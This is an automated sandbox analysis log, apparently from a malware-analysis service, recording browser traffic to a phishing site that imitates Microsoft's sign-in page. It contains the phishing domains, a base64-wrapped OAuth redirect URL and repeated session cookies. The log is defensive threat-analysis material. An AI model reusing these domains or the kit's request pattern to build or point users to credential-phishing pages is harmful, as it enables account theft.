buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; esctx-rd9uwk5JNAs=AQABCQEAAABVrSpeuWamRam2jAF1XRQEwzs_ase4bdeAJM7aGxvEK2c5L1QtB0NKAZv4B1UaWjL-AK_Cu__6qtcBJFGQH8nRp--TMNQSmnrYyl6ag0NqYCBPdvaZXGiF7AEaKfUfsdQJzkae4DNOLp5iu5z_Bkw-6jheXkX-xKMjBcl_UvWeliAA; fpc=AjUAFJMlP0ZCgsS-Ll1segK8Ae7AAQAAAAdIat8OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; esctx-rd9uwk5JNAs=AQABCQEAAABVrSpeuWamRam2jAF1XRQEwzs_ase4bdeAJM7aGxvEK2c5L1QtB0NKAZv4B1UaWjL-AK_Cu__6qtcBJFGQH8nRp--TMNQSmnrYyl6ag0NqYCBPdvaZXGiF7AEaKfUfsdQJzkae4DNOLp5iu5z_Bkw-6jheXkX-xKMjBcl_UvWeliAA; fpc=AjUAFJMlP0ZCgsS-Ll1segK8Ae7AAQAAAAdIat8OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHr
            Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; esctx-rd9uwk5JNAs=AQABCQEAAABVrSpeuWamRam2jAF1XRQEwzs_ase4bdeAJM7aGxvEK2c5L1QtB0NKAZv4B1UaWjL-AK_Cu__6qtcBJFGQH8nRp--TMNQSmnrYyl6ag0NqYCBPdvaZXGiF7AEaKfUfsdQJzkae4DNOLp5iu5z_Bkw-6jheXkX-xKMjBcl_UvWeliAA; fpc=AjUAFJMlP0ZCgsS-Ll1segK8Ae7AAQAAAAdIat8OAAAA; brcap=0
            Source: global trafficHTTP traffic detected: GET /common/GetCredentialType?mkt=en-US HTTP/1.1Host: hapiinenstys.criadordeconexoes.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; OH.FLID=e4bebde7-5ba4-49d8-b476-931756888516; .AspNetCore.OpenIdConnect.Nonce.49USBfOQied3yWeklneNnBRgMp5V6TCkW50B00X8sZN6-08gUP7C4VT8ltpLeyjKw6t0mWmXCmBMRZb3H0ziB4fa6mZ1mkbAWHlQ5aw3TxS6XAWJfHgahBcWIu2vzNCIOPDrnm96RaYKqI-252pJ-UZjV7QUHfdMfKdYx1uHnSjp6-HfVfS3Kmq9tXZM2YhpqlGz5i1CuYbEO2fzxB7icNR4fUgESr_VGJC8OYz2CXPlROML_6eU_GrG417A1wJo=N; .AspNetCore.Correlation.ZMc9lLc8XG_FHA7AsKemKsGhCyJShH-wCn7fNfhS9zc=N; esctx-jkXTnxbCM=AQABCQEAAABVrSpeuWamRam2jAF1XRQEDNAk-B-2E58z_H0-QJLvGLCw396iyFQ0SQlwZgT_rkZMOjIX0BlREk7SdS_3Gjck40Z4fztkvwmcn1sQXSriR2IzpxLrG5sEdaAuFg4w1VF7xM9sRR01IbnLTCxFsZcflc2zCEZkG2HUgNsPDnuWAiAA; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AXUAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAAB1AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEVTA4RXRMIoxXIbr9n-iyLGrqtPHzQRAW7rkde36tgl54eAYfT65Cw1l2I1F_yOUHXQ4Bf1-8uxohLxNhP3vhk1hOwXrHhhSan6gxhQJ0vFwgAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEF9qztFF8TzKJ8yw-qNgY0YijTe-f6Gn3S_zDUdoMo8ADtwS0kOnPTxatotFeDv9eVfixtbrERDFOAClRQW0h4USvUoYGxKlKqwMOvcH4jVirT7FSHQ0PPhXWhWAwlg5LGVZHrAvF9VazivTmPjaw1zPF1i3dl_I0Em_rxID5G6YgAA; esctx-rd9uwk5JNAs=AQABCQEAAABVrSpeuWamRam2jAF1XRQEwzs_ase4bdeAJM7aGxvEK2c5L1QtB0NKAZv4B1UaWjL-AK_Cu__6qtcBJFGQH8nRp--TMNQSmnrYyl6ag0NqYCBPdvaZXGiF7AEaKfUfsdQJzkae4DNOLp5iu5z_Bkw-6jheXkX-xKMjBcl_UvWeliAA; fpc=AjUAFJMlP0ZCgsS-Ll1segK8Ae7AAQAAAAdIat8OAAAA; brcap=0; MSFPC=GUID=6751c3b369904895b224b708101c96d5&HASH=6751&LV=202503&V=4&LU=1742229787531
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: h89s9dhj.ccbequipamentos.com.br
            Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: hapiinenstys.criadordeconexoes.com.br
            Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
            Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/2100462587:1742228952:oCWRJ_9F7aDLWE5rdVZZqokEYX6VeFO4JC8_BuYfHPM/921df19f1aa9330c/5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3593sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: 5f0QPWAUaeKYb3u9onIZ_IkF5wttGhEKmnf8t0Zrm6E-1742229749-1.1.1.1-yhPGGuzzN6GGa3jTR0pmjl5lW63MvnU_suAvvMWiHP2s4Z8Ctt7xP0BcTNoSFFCacf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateSet-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponlyStrict-Transport-Security: max-age=31536000; includeSubDomainsP3P: CP="DSP CUR OTPi IND OTRi ONL FIN"x-ms-request-id: e6aaaeb0-b819-41db-abc5-537f412f4d00x-ms-ests-server: 2.1.20262.4 - WUS3 ProdSlicesnel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}x-ms-srs: 1.PReferrer-Policy: strict-origin-when-cross-originContent-Security-Policy-Report-Only: object-src 'none'; base-uri 'self'; script-src 'self' 'nonce-c0nvQclRZhutGNbYaV4k-Q' 'unsafe-inline' 'unsafe-eval' https://*.msauth.net https://*.msftauth.net https://*.msftauthimages.net https://*.msauthimages.net https://*.msidentity.com https://*.microsoftonline-p.com https://*.microsoftazuread-sso.com https://*.azureedge.net https://*.outlook.com https://*.office.com https://*.office365.com https://*.microsoft.com https://*.bing.com 'report-sample'; report-uri https://csp.microsoft.com/report/ESTS-UX-AllDate: Mon, 17 Mar 2025 16:42:47 GMTConnection: closeContent-Length: 0Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
            Source: chromecache_76.2.drString found in binary or memory: http://knockoutjs.com/
            Source: chromecache_76.2.drString found in binary or memory: http://www.json.org/json2.js
            Source: chromecache_76.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
            Source: chromecache_76.2.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.js
            Source: chromecache_65.2.drString found in binary or memory: https://login.microsoftonline.com
            Source: chromecache_65.2.drString found in binary or memory: https://login.windows-ppe.net
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 142.250.185.132:443 -> 192.168.2.4:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49794 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49790 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49792 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49793 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.95.206.231:443 -> 192.168.2.4:49791 version: TLS 1.2
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir1428_1999611524Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir1428_1999611524Jump to behavior
            Source: classification engineClassification label: mal68.phis.win@25/37@16/4
            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3340,i,1354710186197194451,1516178957246450856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3440 /prefetch:3
